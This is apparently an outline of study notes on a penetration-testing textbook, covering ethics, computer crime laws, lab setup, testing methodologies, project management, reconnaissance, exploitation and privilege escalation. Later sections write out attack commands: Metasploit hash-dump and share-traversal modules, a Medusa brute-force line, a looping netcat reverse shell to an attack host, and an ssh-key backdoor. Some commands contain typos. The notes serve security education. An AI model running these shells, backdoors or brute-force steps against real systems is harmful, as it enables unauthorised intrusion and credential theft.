Professional Pentesting

Ethics & Hacking
1. Getting Permission to Hack
  1. What is the difference between White Hat and Black Hat hackers? => “permission”
2. Code of Ethics Canons [(ISC)2]
  1. ■
    1. Protect society, the commonwealth, and the infrastructure
    2. Act honorably, honestly, justly, responsibly, and legally
    3. Provide diligent and competent service to principals
    4. Advance and protect the profession
  2. t is really difficult to define exactly what constitutes an ethical or unethical hacker
3. Why Stay Ethical?
  1. Types of computer hackers
    1. Black Hat Hackers
      1. Those who conduct unauthorized penetration attacks against information systems
      2. The reason behind this activity ranges from curiosity to financial gain
      3. In some cases: their activities do not violate the laws of their country
    2. White Hat Hackers
      1. Those individuals who perform security assessments within a contractual agreement
      2. who’s more capable—the Black Hat hacker or the White Hat hacker?
    3. Gray Hat Hackers
4. Ethical Standards
  1. Depending on your certification/location/affiliation
  2. Certifications
    1. (ISC)2
      1. Protect society, the commonwealth, and the infrastructure
      2. Act honorably, honestly, justly, responsibly, and legally
      3. Provide diligent and competent service to principals
      4. Advance and protect the profession
    2. SANS Institute
      1. I will strive to know myself and be honest about my capability
      2. I will conduct my business in a manner that assures that the IT profession is considered one of integrity and professionalism
      3. I respect privacy and confidentiality.
  3. Employer
    1. Almost every company has an ethical standards policy
    2. make sure you include within the contract as part of the recipient’s obligation a clause stating that they have read and will follow your company’s information security policies and ethics standards.
  4. Educational and Institutional Organizations
    1. Many organizations have instituted their own ethical standards
    2. making membership within the organization dependent on acceptance of these ethical standards
  5. (ISSA)
    1. Perform all professional activities and duties in accordance with all applicable laws and the highest ethical principles
    2. Promote generally accepted information security current best practices and standards
    3. Maintain appropriate confidentiality of proprietary or otherwise sensitive information encountered in the course of professional activities
    4. Discharge professional responsibilities with diligence and honesty
    5. Refrain from any activities which might constitute a conflict of interest or otherwise damage the reputation of employers, the information security profession, or the association, and
    6. Not intentionally injure or impugn the professional reputation or practice of colleagues, clients, or employers
  6. Internet Activities Board: unethical behavior
    1. Seeks to gain unauthorized access to the resources of the Internet
    2. Disrupts the intended use of the Internet
    3. Wastes resources (people, capacity, computer) through such actions
    4. Destroys the integrity of computer-based information, and/or
    5. Compromises the privacy of users
  7. (IEEE)
    1. To accept responsibility in making decisions consistent with the safety, health and welfare of the public, and to disclose promptly factors that might endanger the public or the environment
    2. To avoid real or perceived conflicts of interest whenever possible and to disclose them to affected parties when they do exist
    3. To be honest and realistic in stating claims or estimates based on available data
    4. To reject bribery in all its forms
    5. To improve the understanding of technology, its appropriate application, and potential consequences
    6. To maintain and improve our technical competence and to undertake technological tasks for others only if qualified by training or experience, or after full disclosure of pertinent limitations
    7. To seek, accept, and offer honest criticism of technical work, to acknowledge and correct errors, and to credit properly the contributions of others
    8. To treat fairly all persons regardless of such factors as race, religion, gender, disability, age, or national origin
    9. To avoid injuring others, their property, reputation, or employment by false or malicious action
    10. To assist colleagues and coworkers in their professional development and to support them in following this code of ethics
  8. (OECD)
    1. Collection Limitation Principle
    2. Data Quality Principle
    3. Purpose Specification Principle
    4. Use Limitation Principle
    5. Security Safeguards Principle
    6. Openness Principle
    7. Individual Participation Principle
    8. Accountability Principle
5. Computer Crime Laws
  1. Types Of Laws
    1. Civil Law
    2. Criminal Law
    3. Administrative/Regulatory Law
  2. Type Of Computer Crimes And Attacks
    1. Denial of service
    2. Destruction or alteration of information
    3. Dumpster diving
    4. Emanation eavesdropping
    5. Embezzlement
    6. Espionage
    7. Illegal content of material
    8. Information warfare
    9. Malicious code
    10. Masquerading
    11. Social engineering
    12. Software piracy
    13. Spoofing of Internet Protocol (IP) addresses
    14. Terrorism
    15. Theft of passwords
    16. Use of easily-accessible exploit scripts
    17. Network intrusions
  3. U.S. Federal Law
    1. 1970 U.S. Fair Credit Reporting Act
    2. 1970 U.S. Racketeer Influenced and Corrupt Organization (RICO) Act
    3. 1973 U.S. Code of Fair Information Practices
    4. 1974 U.S. Privacy Act
    5. 1978 Foreign Intelligence Surveillance Act
    6. 1986 U.S. Computer Fraud and Abuse Act (amended 1996)
    7. 1986 U.S. Electronic Communications Privacy Act
    8. 1987 U.S. Computer Security Act
    9. 1991 U.S. Federal Sentencing Guidelines
    10. 1994 U.S. Communications Assistance for Law Enforcement Act
    11. 1996 U.S. Economic and Protection of Proprietary Information Act
    12. 1996 U.S. Kennedy-Kassebaum Health Insurance and Portability Accountability Act (amended 2000)
    13. 1996 Title I, Economic Espionage Act
    14. 1998 U.S. DMCA
    15. 1999 U.S. Uniform Computers Information Transactions Act
    16. 2000 U.S. Congress Electronic Signatures in Global and National Commerce Act
    17. 2001 USA PATRIOT Act
    18. 2002 E-Government Act, Title III, the FISMA
  4. U.S. State Law
    1. California SB 1386, in 2003
    2. By 2005, 22 states had enacted similar laws
  5. International Laws
    1. Canada
      1. Criminal Code of Canada, Section 342—Unauthorized Use of Computer
      2. Criminal Code of Canada, Section 184—Interception of Communications
    2. United Kingdom
      1. The Computer Misuse Act (CMA) 1990 (Chapter 18)
      2. The Regulation of Investigatory Powers Act 2000 (Chapter 23)
      3. The Anti-terrorism, Crime and Security Act 2001 (Chapter 24)
      4. The Data Protection Act 1998 (Chapter 29)
      5. The Fraud Act 2006 (Chapter 35)
      6. Potentially the Forgery and Counterfeiting Act 1981 (Chapter 45)
      7. The CMA was recently amended by the Police and Justice Act 2006 (Chapter 48)
      8. The Privacy and Electronic Communications
    3. Australia
      1. Cybercrime Act 2001
      2. Crimes Act 1900 (NSW): Part 6, ss 308-308I
      3. Criminal Code Act Compilation Act 1913 (WA)
    4. Malaysia
      1. Computer Crimes Act 1997 (Act 563)
    5. Singapore
      1. Computer Misuse Act 1993 (Chapter 50A)
    6. Venezuela
      1. Special Computer Crimes Act (Ley Especial de Delitos InformÆticos)
    7. Safe Harbor And Directive 95/46/EC
6. Getting Permission to Hack
  1. Confidentiality Agreement
  2. Company Obligations
  3. Contractor Obligations
  4. Auditing and Monitoring
  5. Conflict Management
Setting up Your Lab
1. Targets in a Pentest Lab
  1. Problems with Learning to Hack
    1. No legitimate targets online to practice against.
    2. it is impossible for a person to create a pentest scenario that they can learn from
    3. The only way to learn is to practice against scenarios created by others
  2. Real-World Scenarios
    1. Learning to hack using real-world servers is risky
    2. Production labs are expensive and availability to the labs is often limited
    3. unless you have the money to throw at the problem, you will need to develop a personal lab
  3. Turn-Key Scenarios
    1. The disadvantage to turn-key pentest scenarios is that they only imitate real-world servers but may not do so faithfully
    2. Despite the disadvantages, turn-key scenarios are the preferred method to learning how to conduct a penetration test.
  4. What Is a LiveCD?
    1. De-ICE
      1. LiveCDs are real servers that contain real-world challenges
      2. Available since January 2007
      3. The challenge is to discover what applications are misconfigured or exploitable and to obtain unauthorized access to the root account
      4. A list of possible vulnerabilities
      5. Bad/weak passwords
      6. Unnecessary services
      7. ftp
      8. telnet
      9. rlogin
      10. Unpatched services
      11. Too much information available (contact info, and so forth)
      12. Poor system configuration
      13. Poor/no encryption methodology
      14. Elevated user privileges
      15. No Internet Protocol (IP) Security filtering
      16. Incorrect firewall rules (plug in and forget?)
      17. Clear-text passwords
      18. Username/password embedded in software
      19. No alarm monitoring
      20. Well-known exploits are not included in the De-ICE challenges
    2. Hackerdemia
      1. designed to be a training platform where various hacker tools could be used and learned
      2. Developed on the Slax Linux
    3. Open Web Application (OWASP)
      1. www.owasp.org
      2. One of the OWASP projects is WebGoat
      3. categories of Web-based attack vectors within WebGoat
      4. Code quality
      5. Unvalidated parameters
      6. Broken access control
      7. Broken authentication and session management
      8. Cross-site scripting (XSS)
      9. Buffer overflows
      10. Injection flaws
      11. Insecure storage
      12. Denial of service (DoS)
      13. Insecure configuration management
      14. Web services
      15. AJAX security
2. Virtual Network Pentest Labs
  1. Keeping It Simple
    1. Cost is usually a driver in trying to keep personal labs small and manageable
    2. There is also no need to maintain a large library of applications
    3. Unless a personal lab retains any sensitive data, a lot of security controls can be eliminated
  2. Virtualization Software
    1. Vmware
    2. Backtrack
    3. De-Ice
3. Protecting Penetration Test Data
  1. Encryption Schemas
    1. Data Encryption
    2. Data Hashing
  2. Securing Pentest Systems
    1. Encrypt the hard drive
    2. Lock hard drives in a safe
    3. Store systems in a physically controlled room
    4. Perform penetration tests against the pentest systems
  3. Mobile Security Concerns
  4. Wireless Lab Data
    1. two separate labs should be created
      1. a wireless lab designed to practice wireless hacking
      2. a separate lab that can be used to conduct system attacks
4. Advanced Pentest Labs
  1. Hardware Considerations
    1. Routers
    2. Firewalls
      1. Firewall evasion is an advanced skill that needs practice
      2. Stateful and stateless firewalls present different problems as well
    3. Intrusion Detection
      1. the most widely used IDS/IPS is the Open Source software application called Snort
      2. www.snort.org
    4. System/Intrusion
    5. Prevention System
  2. Hardware Configuration
    1. De-ICE Network
    2. Challenges
    3. Network Architecture
  3. Operating Systems and Applications
    1. Operating Systems
      1. www.packetstormsecurity.org/UNIX/penetration/rootkits/
      2. Packet Storm links to downloadable rootkits
    2. Applications
      1. remote-db.com
  4. Analyzing Malware—Viruses and Worms
    1. Virtual Versus Nonvirtual Labs
    2. Creating a Controlled Environment
      1. www.xen.org,
      2. Possible lab configuration using Xen hypervisor.
      3. all wireless communication must be disabled
    3. Harvesting Malware
      1. connecting a honeypot directly to the Internet
      2. This allows Nepenthes to harvest malware directly from Internet attacks
    4. Information Analysis
      1. tools
      2. Wireshark
      3. reverse engineering
  5. Other Target Ideas
    1. CTF Events
      1. DefCon CTF
      2. www.openctf.com
      3. www.captf.com/wiki/Main_Page
    2. Web-Based Challenges
      1. www.hackthissite.org/
      2. Crackmes.de
      3. www.hellboundhackers.org
      4. www.try2hack.nl/
    3. Vulnerability Announcements
Methodologies & Frameworks
1. Information System Security Assessment Framework
  1. the ISSAF is a peer-reviewed process that provides in-depth information about how to conduct a penetration test
  2. a professional penetration tester will use most, if not all, of the tools described in the ISSAF
  3. numerous examples of how tools are used within a pentest engagement
  4. a serious problem with the ISSAF : lack of updates
  5. the ISSAF document was in 2006
  6. layers
    1. Information Gathering
    2. Network Mapping
    3. Vulnerability Identification
    4. Penetration
    5. Gaining Access and Privilege Escalation
    6. Enumerating Further
    7. Compromise Remote Users/Sites
    8. Maintaining Access
    9. Covering Tracks
  7. targets
    1. Networks
    2. Hosts
    3. Applications
    4. Databases
  8. phases
    1. Planning and Preparation—Phase I
      1. the steps to exchange initial information, plan, and prepare for the test
      2. efore testing, a formal Assessment Agreement will be signed from both parties
      3. Identification of contact individuals from both side
      4. Opening meeting to confirm the scope, approach, and methodology
      5. Agree to specific test cases and escalation paths
    2. Assessment—Phase II
      1. Network Security
      2. Password Security Testing
      3. Switch Security Assessment
      4. Router Security Assessment
      5. Firewall Security Assessment
      6. ntrusion Detection System Security Assessment
      7. Virtual Private Network Security Assessment
      8. Antivirus System Security Assessment and Management Strategy
      9. Storage Area Network Security
      10. Wireless Local Area Network Security Assessment
      11. Internet User Security
      12. AS 400 Security
      13. Lotus Notes Security
      14. Host Security
      15. Unix/Linux System Security Assessment
      16. Windows System Security Assessment
      17. Novell Netware Security Assessment
      18. Web Server Security Assessment
      19. Application Security
      20. Web Application Security Assessment
      21. SQL Injections
      22. Source Code Auditing
      23. Binary Auditing
      24. Database Security
      25. Remote enumeration of databases
      26. Brute-forcing databases
      27. Process manipulation attack
      28. End-to-end audit of databases
      29. Social Engineering
    3. Reporting, Clean-up, and Destroy Artifacts—Phase III
      1. Reporting
      2. types
      3. verbal
      4. written
      5. the final written report
      6. Management summary
      7. Project scope
      8. Penetration test tools used
      9. Exploits used
      10. Date and time of the tests
      11. All outputs of the tools and exploits
      12. A list of identified vulnerabilities
      13. Recommendations to mitigate identified vulnerabilities, organized into priorities
      14. Clean-up and Destroy Artifacts
2. Open Source Security Testing Methodology Manual
  1. OSSTMM
    1. Introduced to the Information System Security industry in 2000
    2. The current release is version 3.0
    3. maintained by the Institute for Security and Open Methodologies
    4. www.isecom.org
  2. Rules of Engagement
    1. Project Scope
    2. Confidentiality and Nondisclosure Assurance
    3. Emergency Contact Information
    4. Statement of Work Change Process
    5. Test Plan
    6. Test Process
    7. Reporting
  3. Channels
    1. Human Security
    2. Physical Security
    3. Communications
    4. Telecommunications
    5. Data Networks
      1. Network Surveying
      2. Enumeration
      3. Identification
      4. Access Process
      5. Services Identification
      6. Authentication
      7. Spoofing
      8. Phishing
      9. Resource Abuse
  4. Modules
    1. Phase I: Regulatory
      1. Posture Review
      2. Logistics
      3. Active Detection Verification
    2. Phase II: Definitions
      1. Visibility Audit
      2. Access Verification
      3. rust Verification
      4. Controls Verification
    3. Phase III: Information Phase
      1. Process Verification
      2. Configuration Verification
      3. Property Validation
      4. Segregation Review
      5. Exposure Verification
      6. Competitive Intelligence Scouting
    4. Phase IV: Interactive Controls Test Phase
      1. Quarantine Verification
      2. Privileges Audit
      3. Survivability validation
      4. Alert and Log Review
Pentest Project Management
1. Quantitative, Qualitative, and Mixed Methods
  1. Quantitative Analysis
    1. we rely on numbers—and lots of them
    2. Don’t always assume that the measurable data gathered are always correct.
  2. Qualitative Analysis
    1. Quantitative risk analysis relies strictly on measurable data.
    2. The origin of attackf 4 ex
    3. difference between threat and risk
      1. a threat is something that can do damage to a system
      2. The risk describes the likelihood and impact of the threat
    4. The disadvantage: opinions can be biased and influenced by external factors
    5. to prevent bias: use of anonymous submissions
  3. Mixed Method Analysis
    1. The use of just one method to determine metrics is insufficient
    2. requires a larger amount of time and resources
    3. Pentest findings need to be written to match stakeholder expectations
2. Management of a Pentest
  1. Introduction to PMBOK
    1. First published by the PMI in 1987
    2. attempts to standardize project management practices and information
  2. project life cycle
    1. Initiating Process Group
      1. Develop Project Charter
      2. Identify Stakeholders
    2. Planning Process Group
      1. Develop Project Management Plan
      2. Collect Requirement
      3. translating business objectives into technical requirements
      4. Limitations should also be collected
      5. Define Scope
      6. objectives
      7. requirements
      8. boundaries
      9. assumptions
      10. deliverables of a project
      11. Create WBS
      12. Work Breakdown Structure
      13. actual work needs to be done to complete the project
      14. The WBS is not a schedule
      15. Sequence Activities
      16. Estimate Activity Resources(type & quantities)
      17. material
      18. people
      19. equipment
      20. Estimate Activity Durations
      21. Develop Schedule
      22. Estimate Costs
      23. the project may not be worth the cost compared to the revenue the project will generate
      24. Determine Budget
      25. Plan Quality
      26. Develop Human Resource Plan
      27. Plan Communications
      28. Plan Risk Management
      29. Identify Risks
      30. Perform Qualitative Analysis
      31. Plan Risk Responses
      32. Plan Procurements
    3. Executing Process Group
      1. Direct and Manage Project Execution
      2. Perform Quality Assurance
      3. Acquire Project Team
      4. Develop Project Team
      5. Manage Project Team
      6. Distribute Information
      7. Manage Stakeholder Expectations
      8. Conduct Procurements
    4. Closing Process Group
      1. Close Project or Phase
      2. Close Procurements
    5. Monitoring and Controlling Process Group
      1. Monitor and Control Project Work
      2. Perform Integrated Change Control
      3. Verify Scope
      4. Control Scope
      5. Control Schedule
      6. Control Costs
      7. Perform Quality Control
      8. Report Performance
      9. Monitor and Control Risks
      10. Administer Procurements
3. Project Team Members
  1. Roles and Responsibilities
    1. Team Champion
    2. Project Manager
    3. Pentest Engineers
  2. Organizational Structure
    1. Functional Organization
    2. Matrix Organization
    3. Projectized Organization
4. Project Management
  1. Initiating Stage
    1. processes
      1. develop project charter
      2. identify stakeholders
    2. potential stakeholders
      1. Client/Customer Organization
      2. Project Sponsor
      3. Point of Contact
      4. Senior Management
      5. Target System/Network Manager
      6. Target System/Network Administrators
      7. Network Administrators
      8. Network Defense Administrators
      9. Penetration Test Team
      10. Project Manager
      11. Functional Manager
      12. Senior Management
      13. Pentest Engineers
      14. Procurement Department
      15. Government Agencies
      16. Local law Enforcement
      17. Local Law Enforcement Investigators
      18. Federal Law Enforcement
      19. Third-Party Groups
      20. Internet Service Providers
      21. Subject-Matter Experts/Consultants
  2. Planning Stage
  3. Executing Stage
  4. Monitoring and Controlling
  5. Closing Stage
    1. Formal Project Review
    2. Effort Evaluation
    3. Identification of New Projects
    4. Future Project Priority Identification
      1. Overall security risk to the client
      2. Cost of each project
      3. Financial gain of each project
      4. Length of time needed for each project
      5. Skills needed to successfully complete each project
      6. Staff/resource availability
      7. Project sponsor/requestor
5. Solo Pentesting
  1. Initiating Stage
  2. Planning Process Stage
    1. Collect Requirements
    2. Define Scope
    3. Estimate Activity Durations
    4. Develop Schedule
    5. Plan Quality
    6. Plan Communications
    7. Identify Risks
    8. Plan Risk Responses
    9. Plan Procurements
  3. Executing Stage
    1. Direct and Manage Project Execution
    2. Manage Stakeholder Expectations
  4. Closing Stage
    1. ensures that all the reporting is completed
    2. concludes the contract
  5. Monitoring and Controlling
    1. Monitor and Control Project Work
    2. Verify Scope
    3. Control Scope
    4. Perform Quality Control
    5. Monitor and Control Risks
6. Archiving Data
  1. Should You Keep Data?
    1. two schools
      1. keep everything
      2. keep nothing
    2. Legal Issues
    3. E-mail
      1. some e-mails will contain sensitive data that should be protected
      2. roper encryption and access control mechanisms must be in place
    4. Findings and Reports
  2. Securing Documentation
    1. Access Controls
    2. Archival Methods
    3. Archival Locations
    4. Destruction Policies
7. Cleaning up Your Lab
  1. Archiving Lab Data
    1. Proof of Concepts
    2. Malware Analysis
  2. Creating and Using System Images
    1. License Issues
    2. Virtual Machines
    3. “Ghost” Images
  3. Creating a “Clean Shop”
    1. Sanitization Methods Using Hashes
    2. Change Management Controls
8. Planning for Your Next Pentest
  1. Risk Management Register
    1. Creating a Risk Management Register
    2. Prioritization of Risks and Responses
  2. Knowledge Database
    1. Creating a Knowledge Database
    2. Sanitization of Findings
    3. Project Management
    4. Knowledge Database
      1. Points of contacts internal to the company
      2. Points of contacts of client organizations
      3. Resource vendors
      4. List of subject-matter experts
      5. List of past team members and current contact information
      6. Contracts
      7. Statements of work
      8. Project templates
  3. After-Action Review
    1. Project Assessments
      1. Scheduling issues (too little time, too much time, and so forth)
      2. Resource availability
      3. Risk management
      4. Project scope issues (too broad, too narrow, and so forth)
      5. Communication issues
    2. Team Assessments
      1. Technical strengths
      2. Technical weaknesses
      3. Level of effort within each component of the project
      4. Team training ideas
      5. Time management skills
      6. Obstacles that prevented effective teamwork
      7. Overall opinion on productivity of the team
    3. Training Proposals
Information Gathering
1. Passive Information Gathering
  1. Web Presence
    1. Tools
      1. Web browser
      2. Dogpile.com
      3. Alexa.org
      4. Archive.org
      5. Shodanhq.com
      6. dig
      7. nslookup
    2. Informations
      1. Web site address(es)
      2. Web server type
      3. Server locations
      4. Dates, including “date last modified”
      5. Web links—both internally and externally
      6. Web server directory tree
      7. Technologies used (software/hardware)
      8. Encryption standards
      9. Web-enabled languages
      10. Form fields (including hidden fields)
      11. Form variables
      12. Method of form postings
      13. Company contact information
      14. Meta tags
      15. Any comments within Web pages
      16. E-commerce capabilities
      17. Services and products offered
    3. Exercice: gathering info about Nmap
      1. Step 1 : google "Nmap"
      2. Results
      3. Nmap.org
      4. Insecure.org
      5. Sectools.org
      6. Step 2 : Alexa "Nmap.org"
      7. Alexa.org believes => Nmap.org and Insecure.org are related
      8. Nmap.org permits subdomains
      9. scanme.Nmap.org.
      10. Step 3: nmap.org itself
      11. Archive.org
      12. allows to see how the Website has changed over the years
      13. it often has information no longer available through Google
      14. Archive.org does not provide the latest 6 months of archive
      15. Turn Off All Access to Target System
      16. Netcraft.com
      17. Google
      18. site:cgi.Insecure.org
  2. Corporate Data
    1. location
    2. employee information
    3. network information
    4. Google maps
      1. adjoining buildings
      2. buildings across
      3. the street
      4. entrances
      5. window locations
      6. ingress/egress routes
      7. lighting
      8. cameras
      9. access controls
    5. Google Earth
    6. Bing maps
  3. Whois and DNS
    1. Whois
    2. dig
      1. query nameservers
      2. dig ns nmap.org
    3. nslookup
  4. Additional Internet Resources
    1. http://freenews.maxbaud.net
    2. investigated to determine if it has been listed in the SPAM database
      1. it might indicate that the mail server had been compromised in the past
      2. www.dnsbl.info
    3. job sites
2. Active Information Gathering
  1. DNS Interrogation
    1. version number of the Berkeley Internet Name Domain (BIND)
    2. ns1.titan.net
  2. E-mail Accounts
    1. Goal: create a list of users that reside on the system
    2. helpful in any brute-force attack & login attempt
    3. social engineering purposes
  3. Perimeter Network Identification
  4. Network Surveying
    1. Goal: identify how many systems reside within the network and their associated IP address
    2. Use Nmap
      1. nmap -sF 192.168.1.1-255
    3. Use netdiscover
Vulnerability Identification
1. Port Scanning
  1. Target Verification
    1. Active Scans
      1. Ping
      2. Msgs used to determine if the target is alive
      3. Echo Request
      4. Echo Replay
      5. initial request: set the Type field to “8” & send it
      6. If target system is alive => Return a datagram using the value of "0"
      7. Results are not always accurate => protection against random scans
      8. nmap -sP 192.168.1.123
      9. ICMP echo request
      10. TCP ACK packet
      11. nmap -sP 192.168.1.0/24
    2. Passive Scans
  2. UDP Scanning
    1. disadvantages
      1. slow when compared to TCP scans
      2. most exploitable applications use TCP
    2. possible results returned (UDP scan)
      1. Open
      2. the existence of an active UDP port
      3. Open/filtered
      4. No response was received
      5. Closed
      6. “port unreachable”
      7. Filtered
    3. If OPEN or CLOSED => the target is ALIVE
    4. If OPEN/FILTRED or FILTRED => IPS or Firewall is intercepting => We need to adjust our attack
    5. UDP scans are not something most firewall administrators think about
  3. TCP Scanning
    1. TCP Connect Scan (-sT)
      1. most reliable method of determining port activity
      2. complete three-way TCP handshake
      3. may be noticed by IDSes
      4. advantage: we will know for certain whether an application is truly present or not
    2. TCP SYN Stealth Scan (-sS)
      1. creates a half-open connection
      2. this might help against IDSes
      3. advantage: speed
  4. Perimeter Avoidance Scanning
    1. ACK Scan (-sA)
      1. send an ACK to the target system
      2. firewall will assume a communication channel that already exists
    2. Null Scan Attack (-sN)
    3. FIN (-sF) and Xmas Tree (-sX) Scans
2. System Identification
  1. Active OS Fingerprinting
    1. Nmap can scan a system and identify the OS
    2. nmap -O 192.168.1.100
    3. Another tool we can use is xprobe2
    4. xprobe2 -p tcp:80:open 192.168.1.100
  2. Passive OS Fingerprinting
    1. equires a lot of patience
    2. Objective: Capture TCP packets stealthily
    3. p0f Scan
    4. ARP poisoning attack
3. Services Identification
  1. Banner Grabbing
    1. Launch Nmap using the -sV => grab banner information from apps
    2. Banner grabbing using Telnet
  2. Enumerating Unknown Services
    1. Connect to the ports manually and see what type of information is returned
    2. After we connect(Using NetCat), we can send random data
    3. nc pWnOS 1000
    4. Connecting to target using smbclient.
4. Vulnerability Identification
  1. http://nvd.nist.gov/
  2. If we were simply conducting a risk assessment without conducting a penetration test, this is where we would probably stop
Vulnerability Exploitation
1. Introduction
  1. In this chap, we'll allow automated tools to do the same thing(chap 7) for us
  2. Without understanding how to gather the application and OS version information yourself, you cannot accurately understand how automated tools gather the same information
  3. if we want to call ourselves professionals, that we cannot simply allow our tools to do our work for us
  4. four steps
    1. Find proof of concept code/tool
    2. Test proof of concept code/tool
      1. testing the exploit against a test server first
      2. we really cannot know what will happen when we launch the exploit, unless we examine the code first, or test it within a test environment
      3. an exploit can have different results, including crashing the target and losing all data and functionality
    3. Write your own proof of concept code/tool
    4. Use proof of concept code/tool against target
2. Automated Tools
  1. The top 10 vulnerability scanners
    1. Nessus (open source/commercial)
    2. OpenVAS (open source)
    3. Core Impact (commercial)
    4. Nexpose (commercial)
    5. GFI LanGuard (commercial)
    6. QualysGuard (commercial)
    7. MBSA (open source)
    8. Retina (commercial)
    9. Secunia PSI (open source)
    10. Nipper (commercial)
  2. Vulnerability exploitation tools
    1. Metasploit (open source/commercial)
    2. Core Impact (commercial)
    3. sqlmap (open source)
    4. Canvas (commercial)
    5. Netsparker (commercial)
  3. Nmap Scripts
    1. usr/share/nmap/scripts
    2. To invoke these scripts, we need to use the -A flag
    3. nmap -A 10.0.3.125
  4. Default Login Scans
    1. Frequent issue: The use of default or weak passwords on applications
    2. There are multiple tools we can use: Medusa, Hydra...
    3. #> medusa –h <targetIP> -u root -p password -e ns -O mysql.medusa.out –M mysql
  5. OpenVAS
  6. JBroFuzz
    1. Fuzzing is a process where random data are passed to an application in the hopes that an anomaly will be detected
    2. Fuzzing can take quite a while to complete
    3. We can use a fuzzer whenever we discover a place to insert user-supplied data in an application
  7. Metasploit
    1. FTP
      1. use auxiliary/scanner/ftp/anonymous
      2. auxiliary/scanner/ftp/ftp_login
    2. Simple Mail Transfer Protocol
      1. can be used to identify usernames on a target system or within the organization
      2. User enumeration via SMTP
      3. use auxiliary/scanner/smtp/smtp_enum
      4. show options
      5. set RHOST 192.168.1.123
      6. run
      7. Once we have this information, we can attempt to find passwords for each user
      8. launch bogus e-mails as the root user (Social Engineering)
    3. Server Message Block
      1. SMB user enumeration
      2. use auxiliary/scanner/smb/smb_enumshares
      3. Brute-force of “msfadmin” password.
      4. Creating link to remote file share.
      5. use auxiliary/admin/smb/samba_symlink_traversal
      6. show options
      7. set SMESHARE tmp
      8. exploit
      9. Logging onto the remote system’s/root directory.
    4. Network File Shares
      1. We can scan for Network File Shares (NFS)
      2. using the “nsfmount” module in Metasploit
      3. use auxiliary/scanner/nfs/nfsmount
      4. show options
      5. set RHOTS
      6. run
    5. MySQL
      1. auxiliary/scanner/mysql/mysql_login module
      2. grab the hashes stored in the MySQL
      3. use auxiliary/scanner/mysql/mysql_hashdump
      4. show options
      5. set RHOST
      6. run
    6. PostgreSQL
      1. postgres_login module
      2. auxiliary/scanner/postgres/postgres_schemadump
      3. Metasploit also has modules for Oracle as well
    7. VNC
      1. use auxiliary/scanner/vnc/vnc_none_auth
      2. show options
      3. st RHOST
      4. set USERNAME root
      5. run
  8. Never trust a tool and use more than one for each task
3. Exploit Code
  1. Internet Sites
    1. the repository of exploits: www.explot-db.com
    2. So, which exploits should we attempt? All of them!
Local System Attacks
1. System Exploitation
  1. Internal Vulnerabilities
    1. only possible if local access is somehow obtained first
    2. an effective method of elevating privileges on a target system
  2. Sensitive Data
    1. We may not always obtain administrative permissions
    2. gather sensitive information that shouldn’t be available to unauthorized users
    3. Ex: We successfully downloaded the / etc/shadow
    4. Once we have access to a command prompt, we need to take a bit of time and really explore the server for useful data
  3. Meterpreter
    1. Once we have Meterpreter running, we can explore the exploited system.
    2. It is possible to “jump” from the current user/process into one that is more elevated
2. Shells and Reverse Shells
  1. Netcat Shell
    1. To use netcat as a backdoor we need to have a way to direct all communication through netcat into a shell or command prompt
    2. Nmap scan against the Hackerdemia => nmap 192.168.1.123
    3. The port we will look at is port 1337
    4. When a connection is made, netcat will execute the bash shell, allowing us to interact with the system
    5. Permissions are transferred whenever a process is launched
    6. the bash shell will inherit the same permissions of whoever started the netcat process => system itself.
    7. nc 192.168.1.123 1337
      1. whomi => root
      2. pwd => /
      3. ifconfig => eth0 , lo ...
      4. uname -a => Linux slax 2.6.16
    8. We now have a backdoor that will be accessible as long as the startup script is running.
  2. Netcat Reverse Shell
    1. A reverse shell will often prevent firewalls from severing our connection
    2. Reverse shell using netcat.
      1. #!/bin/sh
      2. while true : do
      3. nc 192.168.1.10 1337 -e /bin/sh
      4. done
    3. nc -l -p 1337
    4. Because we are root on the attack system, it really doesn’t matter which port we use
    5. everything we send to the target system will be in cleartext => netcat does not encrypt the communication stream
    6. If we create a backdoor in a penetration test, we will need to be able to remove them later
3. Encrypted Tunnels
  1. An SSH tunnel will allow us to push malware and additional exploits onto the victim system without being detected
  2. ddition of iptables rules to block any incoming traffic from the attack system
4. Adding a Host Firewall (Optional)
  1. Setting Up the SSH Reverse Shell
    1. nc 192.168.1.100 22
    2. SSH 1.99-OpenSSH_4.3
    3. root
    4. protocol mismatch
  2. Setting Up Public/Private Keys
    1. first create a public/private rsa key pair with an empty password, which allows us to automate our connection
    2. create a netcat listener that will push the id_rsa file to a connecting system
    3. append the id_rsa.pub file to the authorized_keys file on our attack server
      1. cat id_rsa.pub >> /root/.ssh/authorized_keys
    4. Setup on attack server for SSH connection => ssh-keygen -t rsa
    5. connect an SSH client to the local listening port: ssh -p 44444 localhost
  3. Launch the Encrypted Reverse Shell
5. Other Encryption and Tunnel Methods
  1. Cryptcat
    1. twofish encryption algorithm
    2. both systems must possess the same cipher key
    3. http://cryptcat.sourceforge.net
  2. Matahari
    1. written in Python
    2. uses the ARC4 encryption algorithm
    3. ARC4 is now a deprecated method of encryption but is still useful in a penetration test environment
    4. http://matahari.sourceforge.net
  3. Proxytunnel
    1. can create an OpenSSH tunnel to our attack system
    2. shell access to the victim server
    3. http://proxytunnel.sourceforge.net
  4. Socat
    1. can encrypt the traffic using OpenSSL
    2. www.dest-unreach.org/socat/
  5. Stunnel
    1. an SSL wrapper
    2. https://stunnel.org/
Privilege Escalation
1. Password Attacks
  1. Remote Password Attacks
    1. Before we begin, we need to create and gather dictionaries
    2. Create additional dictionaries according to our current target
    3. De-ICE 1.100
      1. we see a list of different e-mail addresses
      2. we can use these e-mails to build a list
      3. well. We may be able to avoid adding variations if we already know the pattern used within an organization to assign usernames to employees
      4. we have a partial list of potential login names.
      5. root
      6. adamsa
      7. banterb
      8. ...
      9. we conduct an Nmap scan against the target system
      10. Weak password for username “bbanter.” (Hydra)
      11. “bbanter” has very limited access to the system
      12. othing useful on the system
      13. attack against the “aadams”
      14. we will be using the “rockyou.txt” file available at SkullSecurity.org
      15. Successful dictionary attack
  2. Local Password Attacks
    1. dependent on our ability to capture hashes from a compromised system
    2. Hashes from Metasploitable
    3. we launch JTR against the hash file using the rockyou.txt dictionary
    4. “msfadmin” username has a password of “msfadmin”
  3. Dictionary Attacks
2. Network Packet Sniffing
  1. MITM attack using Ettercap
  2. The MITM attack is totally independent from the sniffing
  3. The aim of the attack is to hijack packets and redirect them to ettercap
  4. You can choose the MITM attack that you prefer and also combine some of them to perform different attacks at the same time
  5. methods in which network data can be captured
    1. Domain name system (DNS)—Cache poisoning
    2. DNS forgery
    3. User interface (UI) redressing
    4. Border Gateway Protocol (BGP) hijacking
    5. Port Stealing
    6. Dynamic Host Configuration Protocol (DHCP) spoofing
